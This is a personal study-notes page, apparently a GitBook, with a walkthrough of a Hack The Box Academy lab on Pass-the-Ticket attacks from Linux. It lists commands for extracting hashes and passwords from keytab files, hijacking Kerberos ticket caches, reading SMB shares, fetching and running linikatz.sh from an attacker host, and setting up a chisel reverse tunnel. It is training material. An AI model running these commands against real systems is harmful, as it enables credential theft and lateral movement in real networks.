kyou
  • WHOAMI
    • Robemar Aviles
  • Tryhackme
    • View
      • Advent of Cyber 2024
        • Day 01
        • Day 02
      • Boiler CTF
      • Anonymous
      • Archangel
      • Lian_Yu
      • Gaming Server
      • Chocolate Factory
      • Easy Peasy
      • Brute It
      • Ignite
      • Brooklyn Nine Nine
      • TryHack3M: Bricks Heist
      • Dreaming
      • Overpass 1
      • SQLMAP
      • Chill Hack
      • Year of the rabbit
      • Become a hacker
      • Golden Eye
      • Mr. Robot
      • Linux File System Analysis
      • Skynet
      • Fowsniff
      • Introduction to OWASP Zap
      • Brute Force Heroes
      • Game Zone
      • Lazy Admin
      • Bounty Hacker
      • OOB XXE
      • HackPark
      • Alfred
      • Windows Local Persistence
      • Hacking with PowerShell
      • Phishing
      • Python for Pentesters
      • Wireshark: The Basics
      • Hydra
      • Governance & Regulation
      • Junior Security Analyst Intro
      • Wonderland
      • Burp Suite: The Basics (Old)
      • Burp Suite: Extensions
      • Burp Suite: Other Modules
      • Burp Suite: Intruder
      • Net Sec Challenge
      • Nmap Post Port Scans
      • Nmap Advanced Port Scans
      • Nmap Basic Port Scans
      • Nmap Live Host Discovery
      • Protocols and Servers 2
      • Protocols and Servers
      • Command Injection
      • Cross-Site Scripting
      • Vulnerability Capstone
      • Exploit Vulnerabilities
      • Intro to SSRF
      • File Inclusion
      • IDOR
      • Authentication Bypass
      • Subdomain Enumeration
      • Windows Privilege Escalation
      • Steel Mountain
      • Upload Vulnerabilities
      • Blue
      • Looking Glass
      • Metasploit: Exploitation
      • Metasploit: Meterpreter
      • What the shell?
      • Common Linux Privesc
      • John The Ripper
      • Hashing - Crypto 101
      • Crack the hash
      • Res
      • Wireshark: The Basics
      • Network Services 2
      • Network Services
      • Break Out The Cage
      • Anthem
      • Ice
      • Startup
      • Kenobi
      • Bolt
      • Basic Pentesting
      • Linux Privilege Escalation
      • Source
      • Agent Sudo
      • Red Team Fundamentals
      • Red Team Engagement
      • Cyborg
      • Pre Security
        • OSI Model
        • Packets & Frames
        • Extending your network
        • Putting it all together
        • How websites work
      • Introduction to Cyber Security
        • Intro to Defensive Security
        • Careers in Cyber
        • Network Security
        • Security Operations
        • Operating System Security
  • Hack the box
    • View
      • Oopsie
      • Windows Fundamentals
      • Archetype
      • Bizness
      • Three
      • Redeemer
      • Dancing
      • Fawn
      • Meow
      • Responder
      • Crocodile
      • Sequel
      • Appointment
  • Academy HTB
    • View
      • Bug Bounty Hunter
        • Before exam
        • Exploits
          • HTML Injection
          • Cross-Site Scripting (XSS)
          • Cross-Site Request Forgery (CSRF)
          • SQL Injection
          • Local File Inclusion (LFI)
          • Remote File Inclusion
          • Command Injection
          • Insecure Direct Object Reference (IDOR)
          • XML External Entity (XXE)
        • Commands
          • curl
          • mysql
        • Web Requests
          • Hypertext Transfer Protocol (HTTP)
          • Hypertext Transfer Protocol Secure (HTTPS)
          • HTTP Requests and Responses
          • HTTP Headers
          • HTTP Methods and Codes
          • GET
          • POST
          • CRUD API
        • Introduction to Web Applications
          • Introduction
          • Web Application Layout
          • Front End vs. Back End
          • HTML
          • CSS
          • JavaScript
          • Sensitive Data Exposure
          • HTML Injection
          • Cross-Site Scripting (XSS)
          • Cross-Site Request Forgery (CSRF)
          • Back End Servers
          • Web Servers
          • Databases
          • Development Framework & APIs
          • Common Web Vulnerabilities
          • Public Vulnerabilities
          • Next Steps
        • Attacking Web Application with Ffuf
          • Introduction
          • Web Fuzzing
          • Directory Fuzzing
          • Page Fuzzing
          • Recursive Fuzzing
          • DNS Records
          • Sub-domain Fuzzing
          • Vhost Fuzzing
          • Filtering Results
          • Parameter Fuzzing - GET
          • Parameter Fuzzing - POST
          • Value Fuzzing
          • Skills Assessment
        • SQL Injection Fundamentals
          • Introduction
          • Intro to Databases
          • Types of Databases
          • Intro to MySQL
          • SQL Statements
          • Query Results
          • SQL Operators
          • Intro to SQL Injections
          • Subverting Query Logic
          • Using Comments
          • Union Clause
          • Union Injection
          • Database Enumeration
          • Reading Files
          • Writing Files
          • Mitigating SQL Injection
          • Skills Assessment - SQL Injection Fundamentals
        • File Inclusion
          • Intro to File Inclusions
          • Local File Inclusion (LFI)
          • Basic Bypasses
          • PHP Filters
          • PHP Wrappers
          • Remote File Inclusion (RFI)
          • LFI and File Uploads
          • Log Poisoning
          • Automated Scanning
          • File Inclusion Prevention
          • Skills Assessment - File Inclusion
        • Web Attacks
          • Introduction to Web Attacks
          • Intro to HTTP Verb Tampering
          • Bypassing Basic Authentication
          • Bypassing Security Filters
          • Verb Tampering Prevention
          • Intro to IDOR
          • Identifying IDORs
          • Mass IDOR Enumeration
          • Bypassing Encoded References
          • IDOR in Insecure APIs
          • Chaining IDOR Vulnerabilities
          • IDOR Prevention
          • Intro to XXE
          • Local File Disclosure
          • Advanced File Disclosure
          • Blind Data Exfiltration
          • XXE Injector
          • XXE Prevention
          • Web Attacks - Skills Assessment
      • Penetration Tester
        • Getting Started
          • Infosec Overview
          • Getting Started with a Pentest Distro
          • Staying Organized
          • Connecting Using VPN
          • Common Terms
          • Basic Tools
          • Service Scanning
          • Web Enumeration
          • Public exploits
          • Types of shells
          • Privilege Escalation
          • Transferring Files
          • Starting Out
          • Navigating HTB
          • Nibbles - Enumeration
          • Nibbles - Web Footprinting
          • Nibbles -Initial Foothold
          • Nibbles - Privilege Escalation
          • Nibbles - Alternate User Method - Metasploit
          • Common Pitfalls
          • Getting Help
          • Next Steps
          • Knowledge Check
        • File Transfer
          • Introduction
          • Windows File Transfer Methods
          • Linux File Transfer Methods
          • Transferring Files with Code
          • Miscellaneous File Transfer Methods
          • Protected File Transfers
          • Living off The Land
          • Detection
          • Evading Detection
        • Using the Metasploit Framework
          • Preface
          • Introduction to Metasploit
          • Introduction to MSFconsole
          • Modules
          • Targets
          • Payload
          • Encoders
          • Databases
          • Plugins
          • Sessions
          • Meterpreter
          • Writing and Importing Modules
          • Introduction to MSFVenom
          • Firewall and IDS/IPS Evasion
          • Metasploit-Framework Updates - August 2020
        • Shells & Payloads
          • Shells Jack Us In, Payloads Deliver Us Shells
          • CAT5 Security's Engagement Preparation
          • Anatomy of a Shell
          • Bind Shells
          • Reverse Shells
          • Introduction to Payloads
          • Automating Payloads & Delivery with Metasploit
          • Crafting Payloads with MSFvenom
          • Infiltrating Windows
          • Infiltrating Unix/Linux
          • Spawning Interactive Shells
          • Introduction to Web Shells
          • Laudanum, One Webshell to Rule Them All
          • Antak Webshell
          • PHP Web Shells
          • The Live Engagement
          • Detection & Prevention
        • Penetration Testing Process
          • Introduction to the Penetration Tester Path
          • Academy Modules Layout
          • Academy Exercises & Questions
          • Penetration Testing Overview
          • Laws and Regulations
          • Penetration Testing Process
          • Pre-Engagement
          • Information Gathering
          • Vulnerability Assessment
          • Exploitation
          • Post-Exploitation
          • Lateral Movement
          • Proof-of-Concept
          • Post-Engagement
          • Practice
        • Network Enumeration with Nmap
          • Enumeration
          • Introduction to Nmap
          • Host Discovery
          • Host and Port Scanning
          • Saving the Results
          • Service Enumeration
          • Nmap Scripting Engine
          • Performance
          • Firewall and IDS/IPS Evasion
          • Firewall and IDS/IPS Evasion - Easy Lab
          • Firewall and IDS/IPS Evasion - Medium Lab
          • Firewall and IDS/IPS Evasion - Hard Lab
        • Footprinting
          • Enumeration Principles
          • Enumeration Methodology
          • Domain Information
          • Cloud Resources
          • Staff
          • FTP
          • SMB
          • NFS
          • DNS
          • SMTP
          • IMAP / POP3
          • SNMP
          • MySQL
          • MSSQL
          • Oracle TNS
          • IPMI
          • Linux Remote Management Protocols
          • Windows Remote Management Protocols
          • Easy Lab
          • Medium Lab
          • Hard Lab
        • Information Gathering - Web Edition
          • Information Gathering
          • Whois
          • DNS
          • Passive Subdomain Enumeration
          • Passive Infrastructure Identification
          • Active Infrastructure Identification
          • Active Subdomain Enumeration
          • Virtual Hosts
          • Crawling
          • Information Gathering - Web - Skills Assessment
        • Attacking Common Services
          • Interacting with Common Services
          • The Concept of Attacks
          • Service Misconfigurations
          • Finding Sensitive Information
          • Attacking FTP
          • Latest FTP Vulnerabilities
          • Attacking SMB
          • Latest SMB Vulnerabilities
          • Attacking SQL Databases
          • Latest SQL Vulnerabilities
          • Attacking RDP
          • Latest RDP Vulnerabilities
          • Attacking DNS
          • Latest DNS Vulnerabilities
          • Attacking Email Services
          • Latest Email Service Vulnerabilities
          • Attacking Common Services - Easy Lab
          • Attacking Common Services - Medium
          • Attacking Common Services - Hard
        • Login Brute Forcing
          • Introduction to Brute Forcing
          • Password Attacks
          • Default Passwords
          • Username Brute Force
          • Hydra Modules
          • Determine Login Parameters
          • Login Form Attacks
          • Personalized Wordlists
          • Service Authentication Brute Forcing
          • Skills Assessment
          • Skills Assessment 2
        • Password Attacks
          • Theory of Protection
          • Credential Storage
          • John The Ripper
          • Network Services
          • Password Mutations
          • Password Reuse / Default Passwords
          • Attacking SAM
          • Attacking LSASS
          • Attacking Active Directory & NTDS.dit
          • Credential Hunting in Windows
          • Credential Hunting in Linux
          • Passwd, Shadow & Opasswd
          • Pass the Hash (PtH)
          • Pass the Ticket (PtT) from Windows
          • Pass the Ticket (PtT) from Linux
          • Protected Files
          • Protected Archives
          • Password Policies
          • Password Managers
          • Password Attacks Lab - Easy
          • Password Attacks Lab - Medium
          • Password Attacks Lab - Hard
        • Pivoting, Tunneling, and Port Forwarding
          • Introduction to Pivoting, Tunneling, and Port Forwarding
          • The Networking Behind Pivoting
          • Dynamic Port Forwarding with SSH and SOCKS Tunneling
          • Remote/Reverse Port Forwarding with SSH
          • Meterpreter Tunneling & Port Forwarding
          • Socat Redirection with a Reverse Shell
          • Socat Redirection with a Bind Shell
          • SSH for Windows: plink.exe
          • SSH Pivoting with Sshuttle
          • Web Server Pivoting with Rpivot
          • Port Forwarding with Windows Netsh
          • DNS Tunneling with Dnscat2
          • SOCKS5 Tunneling with Chisel
          • ICMP Tunneling with SOCKS
          • RDP and SOCKS Tunneling with SocksOverRDP
          • Skills Assessment
        • Active Directory Enumeration & Attacks
          • Introduction to Active Directory Enumeration & Attacks
          • Tools of the Trade
          • Scenario
          • External Recon and Enumeration Principles
          • Initial Enumeration of the Domain
          • LLMNR/NBT-NS Poisoning - from Linux
          • LLMNR/NBT-NS Poisoning - from Windows
          • Password Spraying Overview
          • Enumerating & Retrieving Password Policies
          • Password Spraying - Making a Target User List
          • Internal Password Spraying - from Linux
          • Internal Password Spraying - from Windows
          • Enumerating Security Controls
          • Credentialed Enumeration - from Linux
          • Credentialed Enumeration - from Windows
      • SOC Analyst
        • Incident Handling Process
          • Incident Handling
          • Cyber Kill Chain
          • Incident Handling Process Overview
          • Preparation Stage (Part 1)
          • Preparation Stage (Part 2)
          • Detection & Analysis Stage (Part 1)
          • Detection & Analysis Stage (Part 2)
          • Containment, Eradication, & Recovery Stage
          • Post-Incident Activity Stage
        • Security Monitoring & SIEM Fundamentals
          • SIEM Definition & Fundamentals
          • Introduction To The Elastic Stack
          • SOC Definition & Fundamentals
          • MITRE ATT&CK & Security Operations
          • SIEM Use Case Development
          • SIEM Visualization Example 1: Failed Logon Attempts (All Users)
          • SIEM Visualization Example 2: Failed Logon Attempts (Disabled Users)
          • SIEM Visualization Example 3: Successful RDP Logon Related To Service Accounts
          • SIEM Visualization Example 4: Users Added Or Removed From A Local Group (Within A Specific Timeframe
        • Understanding Log Sources & Investigating with Splunk
          • Introduction To Splunk & SPL
      • Windows Fundamentals
        • Introduction to Windows
        • Operating System Structure
        • File System
        • NTFS vs. Share Permissions
        • Windows Services & Processes
        • Service Permissions
        • Windows Sessions
        • Interacting with the Windows Operating System
        • Windows Management Instrumentation (WMI)
        • Microsoft Management Console (MMC)
        • Windows Subsystem for Linux (WSL)
        • Desktop Experience vs. Server Core
        • Windows Security
        • Skills Assessment - Windows Fundamentals
      • Introduction to Active Directory
        • Why Active Directory?
        • Active Directory Research Over the Years
        • Active Directory Structure
        • Active Directory Terminology
        • Active Directory Objects
        • Active Directory Functionality
        • Kerberos, DNS, LDAP, MSRPC
        • NTLM Authentication
        • User and Machine Accounts
        • Active Directory Groups
        • Active Directory Rights and Privileges
        • Security in Active Directory
        • Examining Group Policy
        • AD Administration: Guided Lab Part I
        • AD Administration: Guided Lab Part II
        • Wrapping It Up
      • Introduction to Networking
        • Networking Overview
        • Network Types
        • Networking Topologies
        • Proxies
        • Networking Models
        • The OSI Model
        • The TCP/IP Model
        • Network Layer
        • IP Addresses
        • Subnetting
  • Over The Wire
    • View
      • Bandit
        • Level 0
        • Level 1
        • Level 2
        • Level 3
        • Level 4
        • Level 5
        • Level 6
        • Level 7
        • Level 8
        • Level 9
        • Level 10
        • Level 11
        • Level 12
  • Under The Wire
    • View
  • PicoCTF
    • View
      • flag_shop
      • plumbing
      • Based
      • useless
      • chrono
      • First Find
      • runme.py
      • Serpentine
      • repetitions
      • Permissions
      • ASCII Numbers
      • Big Zip
      • PW Crack 4
      • PW Crack 3
      • PW Crack 2
      • PW Crack 1
      • HashingJobApp
      • Glitch Cat
      • fixme2.py
      • fixme1.py
      • convertme.py
      • Codebook
      • First Grep
      • Bases
      • strings it
      • what's a net cat?
      • Magikarp Ground Mission
      • Tab, Tab, Attack
      • Static ain't always noise
      • Transformation
      • Nice netcat...
      • information
      • Wave a flag
      • Python Wrangling
      • Mod 26
      • Obedient Cat
  • Portswigger
    • View
  • Hacker101
    • View
      • Micro-CMS v1
      • Trivial
  • Python
    • View
      • Files
        • Number 1 to 100
      • Hackerrank
        • Power - Mod Power
        • Mod Divmod
        • String Split and Join
        • What's Your Name?
        • Find the Runner-Up Score!
        • Print Function
        • Loops
        • Division
        • Arithmetic
        • Python If-Else
        • Hello World
  • SQL
    • View
      • Hackerrank
        • Higher Than 75 Marks
        • Weather Observation Station 1
        • Weather Observation Station 3
        • Weather Observation Station 4
        • Select By ID
        • Select All
        • Revising the Select Query II
        • Revising the Select Query I
        • Japanese Cities' Attributes
        • Japanese Cities' Name
  • Notes
    • View
      • IMPORTANTTTTT
        • Metasploit
        • Nmap
        • Laudanum
        • Sudo
        • LXD/LXC
      • Windows
        • Windows Management Instrumentation (WMI)
        • Windows Remote Management (WinRM)
        • NTDS.DIT
        • Built-in AD Groups
        • Schema Active Directory
        • Trusts Active Directory
        • Foreign Security Principals (FSPs)
        • Replication
        • SYSVOL
        • Fully Qualified Domain Name (FQDN)
        • Read-Only Domain Controller (RODC)
        • FSMO Roles
        • Global Unique Identifier (GUID)
        • Registry
        • User Account Control (UAC)
        • Access Control Entries (ACE)
        • Copying SAM Registry Hives
        • Security Accounts Manager (SAM)
        • Security Identifier (SID)
        • Execution Policy
        • Windows non-interactive accounts
        • Security Descriptor Definition Language (SDDL)
        • Windows System Structure
        • DACL and SACL
      • Nmap
        • Nmap UDP Scan
        • Nmap TCP Scans
        • Nmap Scripting Engine
      • Endpoint Detection and Response
      • SIEM
      • DMARC
      • Forward Proxy and Reverse Proxy
      • Brute Force/ Dictionary Attack
      • SMTP/IMAP/POP
      • Downloading subfinder
      • DNS
      • MITRE ATT&CK
      • Staged vs. Stageless Payloads
      • Server Log Poisoning
      • PHP Session Poisoning
      • secure_file_priv
      • Metasploit Payload
      • Metasploit Types
      • Types of Box
      • Vulnerable Machine/Applications
      • Cron Jobs
      • Webroot
      • Subdomains and Virtual hosts
      • Fuzzing/Gobuster Extensions
      • URI and URL
      • eXtensible Markup Language (XML)
      • Time to Live (TTL)
      • Stateful and Stateless Firewalls
      • IDS vs IPS vs SIEM
      • Intrusion Detection System (IDS) and Intrusion Prevention System (IPS)
      • Reconnaissance and Enumeration
      • Address Resolution Protocol
      • SSL Certificate
      • Transmission Control Protocol (TCP)
      • Dictionary and Brute Force Attack
      • Encoding, Encryption, Cryptography
  • Commands
    • View
      • Windows
        • Get-ADGroupMember
        • Get-ADGroup
        • Get-ADTrust
        • Get-ADUser
        • Get-ADDomain
        • Discover Modules
        • Get-LAPSComputers
        • Find-AdmPwdExtendedRights
        • Get-AppLockerPolicy
        • DomainPasswordSpray
        • PowerView
        • Inveight
        • Rubeus.exe
        • mimikatz.exe
        • Invoke-TheHash
        • laZagne.exe
        • Copying NTDS.dit via evil-winrm
        • Copying Registry Hives with reg.exe
        • reg add
        • net start
        • tscon
        • query user
        • New-PSDrive
        • findstr
        • dir
        • net use
        • net
        • Get-MpComputerStatus
        • Get-WmiObject
        • Get-ExecutionPolicy
        • get-alias
        • Get-ChildItem
        • Get-ACL
        • services.msc
        • tree
        • wmic
        • sc
        • icacls
        • winPEAS
        • Invoke-WebRequest
        • Certutil
        • Get-Service
      • Linux
        • steganography
          • Binwalk
          • Exiftool
          • steghide
          • stegseek
        • password cracking
          • John
          • Hashcat
        • remote desktop
          • rdesktop
          • xfreerdp
          • Remmina
        • common commands
          • grep
          • sed
          • env
          • watch
          • locate
          • tree
          • who
          • last/lastlog
          • stat
          • $PATH
          • 4 characters rockyou.txt
          • TR / CUT
          • Find
          • hexedit
          • Background Process
          • Sudo
          • netstat
          • xxd
        • web enumeration
          • Gobuster
          • ffuf/wfuzz
          • whatweb
        • linux blue team
          • chkrootkit
          • rkhunter
        • linux priv esc
          • laZagne
          • Getcap
          • Linpeas/LinEnum
          • SUID
          • crontab
        • credential hunting
          • Configuration Files
          • Credentials in Configuration Files
          • Databases
          • Notes
          • Scripts
          • Cronjobs
          • SSH
          • Bash History
          • Logs
          • mimipenguin.py
          • laZagne.py
          • firefox_decrypt.py
        • Zip files
          • gunzip
          • unzip
        • FTP
          • FTP - Connect
        • SSH
          • SSH - Connect
          • scp
        • DNS
          • host
          • subbrute
          • sublist3r
          • dnsdumpster
          • subfinder
          • dnsenum
          • dig
          • nslookup
          • fierce
        • SMTP
          • swaks
          • o365spray
          • smtp-user-enum
          • msfconsole
        • SMB
          • Hydra
          • metasploit
          • Sans SMB Cheatsheet
          • ntlmrelayx
          • Mount
          • SMB - Connect
          • netexec
          • Enum4Linux-ng
          • CrackMapExec
          • smbmap
          • rpcclient
          • impacket
          • Psexec
        • IMAP/POP3
          • telnet
          • Evolution
          • curl
          • openssl
          • IMAP - Commands
          • POP3 - Commands
        • SNMP
          • onesixtyone
          • snmpwalk
          • braa
        • Oracle TNS
          • odat
          • sqlplus
        • IPMI
          • msfconsole
        • Rsync
          • rsync
          • nc
          • nmap
        • R-Services
          • nmap
          • rlogin
          • rwho
          • rusers
        • MSSQL
          • MSSQL Commands
          • mssqlclient.py
          • sqsh
          • xp_cmdshell
        • RDP
          • Hydra
          • Crowbar
        • MySQL
        • NFS
        • WinRM
          • crackmapexec
          • Evil-Winrm
        • LDAP
          • ldapsearch
          • windapsearch
        • impacket
          • impacket-wmiexec
          • impacket-smbserver
          • impacket-samrdump
          • impacket-psexec
          • impacket-secretdumps
        • Port Forward
          • ssh
          • proxychains
          • chisel
          • rpivot
          • Netsh
        • bloodhound-python
        • kerbrute
        • tcpdump
        • Ping sweep
        • static binaries
        • Linikatz
        • Finding keytab
        • PS
        • realm
        • pypykatz
        • creds
        • cewl
        • username-anarchy
        • cupp
        • theHarvester
        • Responder
        • msf-virustotal
        • perl
        • php
        • ruby
        • aquatone
        • wafw00f
        • curl
        • msfconsole/meterpreter
        • sqlmap
        • arp-scan
        • nmap
        • Msfvenom
        • Res/PHP
        • enum4linux
        • md5sum
        • Python
        • Redis
        • Telnet
        • RSA
        • Medusa
        • Hydra
        • curl to python
      • LOLbas/GTFObins
      • SQL Injection
      • LFI
  • Google Chrome Password
    • Decrypt Google Chrome Password
    • LaZagne
  • Comptia Security+ 701
    • Professor Messor
      • Security Control
      • Zero Trust
      • Deception and Disruption
      • Change Management
      • Key exchange
      • Encryption Technologies
      • Obfuscation
      • Hashing and Digital Signatures
      • Blockchain Technology
      • Certificates
      • Threat Actors
      • Common Threat Vectors
      • Race Conditions
      • Hardware Vulnerabilities
      • Virtualization Vulnerabilities
      • Mobile Device Vulnerabilities
      • Spyware and Bloatware
      • Other Malware Types
      • Wireless Attacks
      • On-path Attacks
      • Replay Attacks
      • Cryptographic Attacks
      • Indicators of Compromise
      • Segmentation and Access Control
      • Mitigation Techniques
      • Hardening Techniques
      • Cloud Infrastructures
      • Network Infrastructure Concepts
      • Other Infrastructure Concepts
      • Infrastructure Considerations
      • Secure Infrastructures
      • Intrusion Prevention
      • Network Appliances
      • Port Security
      • Firewall Types
      • Secure Communication
      • Data Types and Classifications
      • States of Data
      • Protecting Data
      • Resiliency
      • Recovery Testing
      • Backups
      • Power Resiliency
      • Secure Baselines
      • Hardening Targets
      • Securing Wireless and Mobile
      • Wireless Security Settings
      • Application Security
      • Asset Management
      • Vulnerability Scanning
      • Threat Intelligence
      • Analyzing Vulnerabilities
      • Security Tools
      • Firewalls
      • Operating System Security
      • Email Security
      • Monitoring Data
      • Endpoint Security
      • Identity and Access Management
      • Access Controls
      • Multifactor Authentication
      • Password Security
      • Scripting and Automation
      • Incident Planning
      • Digital Forensics
      • Log Data
      • Security Policies
      • Security Procedures
      • Security Considerations
      • Data Roles and Responsibilities
      • Risk Management
      • Risk Analysis
      • Risk Management Strategies
      • Third-party Risk Assessment
      • Agreement Types
      • Compliance
      • Privacy
      • Audits and Assessments
      • Security Awareness
      • User Training
    • Incident Response Plan, Cyber kill chain
    • SD-WAN
    • MTTR, MTBF, RTO, RPO
    • NetFlow Logs
    • MTBF, MTTR, RPO, RTO
    • Data in-use, at-rest, in-transit
    • Disassociate vs Deauthentication
    • Data Custodians, Data Stewards, Data states, Data subject
    • Data Owners, Data Controllers, Data Processors
    • Public, Sensitive, Confidential, Restricted, Private, Critical
    • Bluejacking, Bluesnarfing, Bluebugging, Blueborne, Bluesmack
    • Private,Secret,Legal,Confidential
    • CTO,DPO,CIO,CSO
    • Amplified, Volumetric, Reflected, Application
    • Resource reuse, Resource exhaustion, Concurrent session usage
    • Rootkit, Backdoor
    • WPS,WAP,WPA,WAF,WPA2,WEP
    • MD5, SHA-3, RIPEMD-160,HMAC
    • CBC, GCM, ECB, CFB
    • ECDHE, ECDSA
    • PFS, PFX, ECB
    • Symmetric, Asymmetric
    • KEK
    • ECC, RC4, MD5, SHA-1, IDEA, DHE,DES,AES
    • TKIP, CCMP
    • AH, ESP, IKE
    • SMTPS,SRTP,SHTTP,S/MIME
    • GPG, PGP
    • FDE, EFS, SED
    • PKCS, PKI
    • BPA, BIA, SLE, and BCP
    • DLP, Radius, IPsec
    • keylogger
    • Compliance reporting, chain of custody, password vaults
    • SLE, ARO,ALE,RTO
    • Data owner, processor, subject, custodian
    • SCAP
    • SASE, RTOS, CRL
    • Playbook, Responsibility matrix, audit committee, right-to-audit
    • Blockchain, Secure enclave, Hashing
    • COPE, CYOD, SSO, BYOD
    • 802.1X, WPA3, PSK, MFA
    • Journaling
    • Record & Full-disk encryption
    • DMARC, SPF ,NAC, DKIM
    • RAS server
    • Vendors, Supplier, Distributors and MSP
    • Gap Analysis
    • Deception and disruption technology
    • Honeypot, token, file and net
    • Non-Repudiation
    • Data masking / Tokenization
    • open public ledger vs block chain
    • cryptographic key management (HSM, TPM, Secure Enclave, KMS)
    • Authentication methods
    • Wi-Fi Evolution | 802.11 Standards Explained
    • AAA and RADIUS vs TACACS+
    • asdasd
    • Phishing tactics
    • IDS/IPS - True/False Positive/Negative
    • Login Pacific
      • Chapter 1
      • Chapter 2
      • Chapter 3
      • Chapter 4
      • Chapter 5
      • Chapter 6
      • Chapter 7
    • Exam Compass
      • 601 - Test 1
      • Data Protection Concepts Quiz
      • Indicators of Malicious Activity Quiz
      • Application Attacks Quiz
      • Network Attacks Quiz
      • Malware Attacks Quiz
      • Security Vulnerabilities Quiz
      • Social Engineering Quiz
      • Threat Vectors & Attack Surfaces Quiz
      • Threat Actor Types Quiz
      • Digital Signatures Quiz
      • Hashing Quiz
      • Encryption Quiz
      • Security Controls Quiz
      • 701 - Test 1
      • 701 - Test 2
      • 701 - Test3
    • Udemy
      • CompTIA Security+ SY0-701: The Ultimate Practice Exam 2024
    • Crucial exam
      • Just 20 free qusetions
  • CCNA
    • Cisco Router, Firewall, Switch
    • UTP Cables / IEEE Ethernet Standard
    • OSI Model & TCP/IP Suite
    • Intro to the CLI
    • Ethernet LAN Switching
    • Ethernet LAN Switching (Part 2)
    • IPv4 Addressing (Part 1)
    • IPv4 Addressing (Part 2)
    • Switch Interfaces
    • IPv4 Header
    • Routing Fundamentals (Part 1)
    • Static Routing (Part 2)
    • The Life of a Packet
    • TRUE FORM OF SUBNET
    • Subnetting (Part 1)
    • Subnetting (Part 2)
    • Subnetting (Part 3 - VLSM)
    • VLANs (Part 1)
    • VLANs (Part 2)
    • VLANs (Part 3)
    • DTP/VTP
  • Malware Analysis Lab
  • TCM
    • Linux 100: Fundamentals
      • IP Sweep
    • Programming 100: Fundamentals
      • Functions
      • Basic Calculator
      • Lists
      • Tuples
      • Dictionaries
      • Importing
      • Sockets
      • Strings Revisite
      • Scanner
      • Writing Reusable and Testable Code
    • Practical Bug Bounty
      • LABS
        • Authentication 0x01
        • Authentication 0x02
        • Authentication 0x03 [Challenge]
        • Auth 0x04 IDOR 0x01
        • Auth 0x05 APIs 0x01
        • Auth 0x06
        • File Inclusion 0x01
        • File Inclusion 0x02
        • File Inclusion 0x03 [Challenge]
        • Injection 0x01
        • Injection 0x02
        • Injection 0x03 [Challenge]
        • Injection 0x04
        • XSS 0x01
        • XSS 0x02
        • XSS 0x03
        • Command Injection 0x01
        • Command Injection 0x02
        • Command injection 0x03 [Challenge]
        • SSTI 0x01
        • SSTI 0x02
        • XXE 0x01
        • Insecure file upload 0x01
        • Insecure file upload 0x02
        • Insecure file upload 0x03
        • CSRF 0x01
        • CSRF 0x02
        • SSRF 0x01
        • Open Redirect 0x01
      • Importantttttttt
      • Automated Scanner
      • XXE
      • SSTI
      • Command Injection
      • LFI/RFI
      • XSS
      • SQLi
      • Sites
      • sqlmap
      • curl
      • nmap
      • ffuf
      • dirb
      • dirbuster
      • subfinder
      • assetfinder
      • amass
      • Combining all result
      • httprobe
      • gowitness
      • burpsuite
      • hydra
      • JWT
      • authorize - burpsuite
    • Practical Web Hacking
      • Authentication
        • Lab: Password reset broken logic
        • Lab: Username enumeration via different responses
        • Lab: Username enumeration via subtly different responses
        • Lab: Username enumeration via response timing
        • Lab: Brute-forcing a stay-logged-in cookie
        • Lab: 2FA simple bypass
      • Access Control
        • Lab: User ID controlled by request parameter
        • Lab: Unprotected admin functionality
        • Lab: Insecure direct object references
        • Lab: Multi-step process with no access control on one step
        • Lab: Referer-based access control
      • SSRF
        • Lab: Basic SSRF against the local server
        • Lab: Basic SSRF against another back-end system
        • Lab: Blind SSRF with out-of-band detection
        • Lab: Blind SSRF with Shellshock exploitation
      • LFI/RFI
        • lab 1
        • lab 2
        • Lab: File path traversal, simple case
        • Lab: File path traversal, traversal sequences blocked with absolute path bypass
        • Lab: File path traversal, validation of start of path
      • XXE
        • Lab: Exploiting XXE using external entities to retrieve files
        • Exploiting XXE via image file upload
        • Lab: Exploiting XInclude to retrieve files
      • JWTs
        • jwt.io
        • Lab: JWT authentication bypass via unverified signature
        • Lab: JWT authentication bypass via flawed signature verification
      • find
      • ffuf
    • Web pen
Powered by GitBook
On this page
  1. Academy HTB
  2. View
  3. Penetration Tester
  4. Password Attacks

Pass the Ticket (PtT) from Linux

June 11, 2024

PreviousPass the Ticket (PtT) from WindowsNextProtected Files

Last updated 10 months ago

ssh david@inlanefreight.htb@10.129.234.123 -p 2222
realm list
find / -name *keytab* -ls 2>/dev/null
python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab 
ntlm- a738f92b3c08b424ec2d99589a9cce60
user - carlos
pass - Password5
ssh carlos@inlanefreight.htb@10.129.234.123 -p 2222
crontab -l
cat /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
python3 /opt/keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
cd ~/.scripts
ls -la
python3 /opt/keytabextract.py svc_workstations._all.kt
user - svc_workstations
pass - Password4
NTLM - 7247e8d4387e76996ff3f18a34316fdd
su svc_workstations@inlanefreight.htb
sudo -l

Use this to get to root

sudo su

As we can see the julio user is domain user and can attempt to get access to the domain shared folder via julio

id julio@inlanefreight.htb
ls -la

Now we can impersonate the user via export command

As you can see we have julio as default principal

klist
export KRB5CCNAME=krb5cc_647401106_VRIdHN
klist

You have to be fast to authenticate to smbclient since the ticket is just temporary

smbclient //dc01/julio -k -c ls -no-pass
smbclient //dc01/julio -k -c 'get julio.txt' -no-pass
ls
cat julio.txt

You gotta find the file containing the credentials of Linux machines in Active Directory.

find / -name *keytab* -ls 2>/dev/null
python3 /opt/keytabextract.py /etc/krb5.keytab
user - LINUX01$
ntlm - 5aa7d65408b1c36bb2d0892b8e53bce8

Or we could just use the keytab since we have permission so that we can impersonate the user linux01

kinit LINUX01$ -k -t /etc/krb5.keytab
klist
smbclient //dc01/linux01 -k -c ls
smbclient //dc01/linux01 -k -c 'get flag.txt'
cat flag.txt

Now for the next not required task

First we have to ssh to the machine

ssh svc_workstations@inlanefreight.htb@10.129.204.23 -p 2222
sudo su

Get the linikatz.sh

This tool will find for kerberos tickets in the system

wget http://10.10.15.13:8000/linikatz.sh
chmod +x linikatz.sh
./linikatz.sh

I made a visual graph about the network

Then for the next one we can try the chisel which is port forwarding tool

First we have to set the IPs in our attacker machine

sudo subl /etc/hosts

172.16.1.10 inlanefreight.htb   inlanefreight   dc01.inlanefreight.htb  dc01
172.16.1.5  ms01.inlanefreight.htb  ms01
sudo subl /usr/local/etc/proxychains.conf

socks5 127.0.0.1 1080
sudo ./chisel server --reverse
xfreerdp /v:10.129.204.23 /u:david /d:inlanefreight.htb /p:Password2 /dynamic-resolution
cd tools
chisel.exe client 10.10.15.13:8080 R:socks

